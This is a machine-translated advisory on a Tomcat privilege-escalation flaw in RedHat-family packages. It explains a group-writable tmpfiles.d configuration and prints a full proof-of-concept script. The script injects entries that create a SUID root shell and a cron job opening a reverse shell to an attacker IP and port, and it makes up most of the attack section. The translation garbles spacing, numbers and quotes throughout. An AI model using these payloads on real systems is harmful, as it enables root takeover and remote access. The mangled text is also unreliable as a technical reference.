I. vulnerability description
Apache Tomcat on RedHat distributions local to mention the right vulnerability
II. Background description
Tomcat is by Apache Software Foundation subordinateβs Jakarta a project development Servlet vessel, in accordance with Sun Microsystems to provide the technical specifications, the realization of the Servlet and JavaServer PageοΌJSPοΌsupport, and provides as aWeb serversome unique functions, like Tomcat managed and controls the platform, secure domain management and the Tomcat valve and so on.
Official website: http://tomcat.apache.org/
III. Description
Apache Tomcat on RedHat distributions the installation package, including CentOS, RedHat, OracleLinux, Fedora,etc. after installation due to file permissions configured properly, it will create a new one to allow the tomcat user permission to read and write to tmpfiles. d configuration files, for example, an attacker can use a WEB vulnerability to read and write to this file, allowing the attacker from the tomcat user permission to elevate to root privileges to achieve complete control of the system.
IV. Vulnerability description
Based on the RedHat release version of Tomcat after installing tomcat, set the user to tomcat. conf file has write permissions, as follows
[root@localhost ~]# ls-al /usr/lib/tmpfiles. d/tomcat. conf
-rw-rw-rβ. 1 root tomcat 4 3 May 1 2 2 0 1 5 /usr/lib/tmpfiles. d/tomcat. conf
tmpfiles. d directory where the configuration file is systemd-tmpfiles used to manage the temporary file, an attacker could very easily inject the malicious payload into the tomcat. conf file, such as a new rally SHELL, the new one has the SUID permission of a file. When/usr/bin/systemd-tmpfiles when executed, the injected payload will get executed.
In REDHAT distributions, the default boot, systemd-tmpfiles will by systemd-tmpfiles-setup. Service service to be implemented, as follows:
[root@localhost www]# cat /usr/lib/systemd/system/systemd-tmpfiles-setup. service |grep ExecStart
ExecStart=/usr/bin/systemd-tmpfiles --create --remove --boot --exclude-prefix=/dev
Depends on the system used, systemd-tmpfiles may also be through other services, cronjobs,startup scripts, and other ways to trigger. Worthy of note in another place is that systemd-tmpfiles will not because the configuration file syntax errors cause an error stop. Therefore an attacker can easily inject malicious PAYLOAD to/usr/lib/tmpfiles. d/tomcat. conf
According to the following POC, we can see
C /usr/share/tomcat/rootsh 4 7 7 0 root root - /bin/bash
z /usr/share/tomcat/rootsh 4 7 7 0 root root -
F /etc/cron. d/tomcatexploit 0 6 4 4 root root -"* * * * * root nohup bash-i >/dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0&1
Is injected into tomcat. conf meaning is to bounce the SHELL, and the new one has the SUID permissions of the shell,in particular C, z,F meaning, The we can man 5 tmpfiles. d to view.
V. POC and the local test
-----------[ tomcat-RH-root.sh ]---------
#!/ bin/bash
ATTACKER_IP=127.0.0.1
ATTACKER_PORT=9 0 9 0
echo-e β\n* Apache Tomcat (RedHat distros) - Root PrivEsc PoC CVE-2 0 1 6-5 4 2 5 *β
echo-e βDiscovered by Dawid Golunski\nβ
echo β[+] Checking vulnerabilityβ
ls-l /usr/lib/tmpfiles. d/tomcat. conf | grep βtomcatβ
if [ $? -ne 0 ]; then
echo βNot vulnerable or the tomcat installed under a different user than βtomcatββ
exit 1
fi
echo-e β\n[+] Your system is vulnerable!β
echo-e β\n[+] Appending data to the /usr/lib/tmpfiles. d/tomcat. confβ¦β
cat>/usr/lib/tmpfiles. d/tomcat. conf
C /usr/share/tomcat/rootsh 4 7 7 0 root root - /bin/bash
z /usr/share/tomcat/rootsh 4 7 7 0 root root -
F /etc/cron. d/tomcatexploit 0 6 4 4 root root -β* * * * * root nohup bash-i >/dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0&1 & \n\nβ
eof
echo β[+] /usr/lib/tmpfiles. d/tomcat. conf contains:β
cat /usr/lib/tmpfiles. d/tomcat. conf
echo-e β\n[+] Payload injected! Wait for your root shellβ¦\nβ
echo-e βOnce β/usr/bin/systemd-tmpfiles --createβ gets executed (on reboot by tmpfiles-setup. service, by cron, by another service etc.),
the rootshell will be created in /usr/share/tomcat/rootsh.
Additionally, a reverse shell should get executed by crond shortly after and connect to $ATTACKER_IP:$ATTACKER_PORT \nβ
--------------[ eof]--------------------
Local test: